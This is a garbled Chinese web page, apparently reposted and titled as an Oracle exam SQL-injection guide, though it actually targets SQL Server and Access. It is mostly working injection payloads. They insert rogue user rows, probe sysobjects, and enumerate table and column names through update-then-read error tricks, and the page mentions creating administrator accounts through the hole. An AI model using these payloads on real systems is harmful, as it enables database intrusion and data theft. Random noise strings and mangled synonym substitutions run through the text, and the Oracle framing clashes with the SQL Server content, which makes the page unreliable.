oracle认证考试SQL注射语句解析（三）

会计考友

经由过程查看ffff的用户资料可得第一个用表叫ad
然后按照表名ad获得这个表的ID 获得第二个表的名字
8 T& z: L% [" O, q0 ^* yinsert into users values（ 666，
" n) h5 b0 ]' j: d0 gchar（0x63）+char（0x68）+char（0x72）+char（0x69）+char（0x73），
char（0x63）+char（0x68）+char（0x72）+char（0x69）+char（0x73）， 0xffff）--
- H; Q/ Q2 ^2 J( D* D9 Oinsert into users values（ 667，123，123，0xffff）--
insert into users values （ 123， ‘admin’‘--’， ‘password’， 0xffff）--
* |4 ~$ j; L% q' P+ B5 t;and user》0
* G5 ?% s: I+ U2 a;and （select count（*） from sysobjects）》0
6 D( _0 ]# C6 k' C. r& P# c# a;and （select count（*） from mysysobjects）》0 //为access数据库
列举出数据表名
;update aaa set aaa=（select top 1 name from sysobjects where xtype=‘u’ and
status》0）;--
这是将第一个表名更新到aaa的字段处。
读出第一个表，第二个表可以这样读出来（在前提后加上 and name《》‘适才获得的表名’）。
+ G. t: }, R- h9 @;update aaa set aaa=（select top 1 name from sysobjects where xtype=‘u’ and
status》0 and name《》‘vote’）;--
6 R6 x5 W) k4 E) c" W0 h1 n然后id=1552 and exists（select * from aaa where aaa》5）
' O* K& c" M0 t1 e% k( e4 X/ D读出第二个表，一个个的读出，直到没有为止。
* x2 S% `, s! I- [8 @" k8 ?6 ]9 ^' e读字段是这样：
" S: c8 H2 s7 t% C  d+ D6 ?" U8 };update aaa set aaa=（select top 1 col_name（object_id（‘表名’），1））;--
5 A- J' o! l  P. K然后id=152 and exists（select * from aaa where aaa》5）犯错，获得字段名
;update aaa set aaa=（select top 1 col_name（object_id（‘表名’），2））;--
9 f- i- K$ Q4 f# ]) j* g9 q然后id=152 and exists（select * from aaa where aaa》5）犯错，获得字段名
［获得数据表名］［将字段值更新为表名，再设法读出这个字段的值就可获得表名］
4 Z* E! J% }0 \4 ]- H% kupdate 表名 set 字段=（select top 1 name from sysobjects where xtype=u and
status》0 ［ and name《》‘你获得的表名’ 查出一个加一个］） ［ where 前提］ select top 1 name from
sysobjects where xtype=u and status》0 and name not in（‘table1’，‘table2’，…）
4 h/ T6 m4 n  l0 k# P经由过程SQLSERVER注入裂痕建数据库打点员帐号和系统打点员帐号［当前帐号必需是SYSADMIN组］
［获得数据表字段名］［将字段值更新为字段名，再设法读出这个字段的值就可获得字段名］
8 e9 y  R" I$ R' [7 zupdate 表名 set 字段=（select top 1 col_name（object_id（‘要发芽的数据表名’），字段列如：1）